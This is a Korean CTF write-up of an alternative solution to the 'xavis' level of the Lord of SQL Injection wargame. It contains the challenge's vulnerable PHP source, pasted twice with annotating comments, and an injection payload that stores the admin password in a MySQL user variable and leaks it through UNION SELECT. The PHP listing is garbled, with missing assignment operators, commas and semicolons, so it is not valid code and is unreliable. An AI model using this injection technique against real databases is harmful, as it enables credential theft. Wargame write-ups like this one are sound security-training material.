


[Lord Of SQL Injection] 19번(추가해결방법)

Kwon Oh! JUN 2022. 2. 9. 00:30

query : select id from prob_xavis where id='admin' and pw=''



<?php 
// Lord of SQL Injection challenge "xavis": the untrusted `pw` query parameter is
// interpolated straight into the SQL string. The deny-lists below only reject a few
// substrings; they are not a substitute for a prepared statement with a bound parameter.
// NOTE(review): this listing is reproduced as rendered on the page; the assignment
// operators, argument commas and some semicolons appear to have been dropped during
// extraction, so it is not valid PHP as shown.
  
include "./config.php"
  
login_chk(); 
  
$db dbconnect(); 
  // First deny-list on the raw parameter: rejects "prob", "_", "." and "()"
  // (case-insensitive). The query is still built by string interpolation afterwards.
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  // Second deny-list: rejects "regex" and "like" (case-insensitive).
  if(
preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  
// Vulnerable sink: {$_GET[pw]} is embedded unescaped inside the quoted pw='...' literal.
$query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  // The built query is echoed back to the client (information disclosure in a real app).
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
// `@` suppresses mysqli errors and warnings, so a failing query silently yields no row.
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
// addslashes() escapes quotes for the second query; the escaped value is also what the
// equality check below compares against.
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  // Solved only when a pw row is found and it equals the submitted value (loose == comparison).
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  
highlight_file(__FILE__); 
?>

select id from prob_xavis where id='admin' and pw='' or (select @a:=pw where id = 'admin') union select @a%23'

select @a:=pw where id = 'admin'

prob_xavis 테이블에서 id가 'admin'인 pw를 찾아서 변수 @a에 대입한다.

*변수 안에 값을 넣는 것 자체가 false라고 한다.

 

union select @a

union 앞에 있는 쿼리와 결과를 합쳐서 id가 'admin'인 pw를 보여준다. 

* select @a:=pw where id = 'admin'이 false이기 때문에 이 쿼리와 union select @a 쿼리를 합쳐서 출력해도 id가 'admin'인 pw만 보여주게 된다.

 


query : select id from prob_xavis where id='admin' and pw='' or (select @a:=pw where id = 'admin') union select @a#'


 

Hello 우왕굳

<?php 
// Lord of SQL Injection challenge "xavis": the untrusted `pw` query parameter is
// interpolated straight into the SQL string. The deny-lists below only reject a few
// substrings; they are not a substitute for a prepared statement with a bound parameter.
// NOTE(review): this listing is reproduced as rendered on the page; the assignment
// operators, argument commas and some semicolons appear to have been dropped during
// extraction, so it is not valid PHP as shown.
  
include "./config.php"
  
login_chk(); 
  
$db dbconnect(); 
  // First deny-list on the raw parameter: rejects "prob", "_", "." and "()"
  // (case-insensitive). The query is still built by string interpolation afterwards.
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  // Second deny-list: rejects "regex" and "like" (case-insensitive).
  if(
preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  
// Vulnerable sink: {$_GET[pw]} is embedded unescaped inside the quoted pw='...' literal.
$query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  // The built query is echoed back to the client (information disclosure in a real app).
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
// `@` suppresses mysqli errors and warnings, so a failing query silently yields no row.
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
// addslashes() escapes quotes for the second query; the escaped value is also what the
// equality check below compares against.
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  // Solved only when a pw row is found and it equals the submitted value (loose == comparison).
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  
highlight_file(__FILE__); 
?>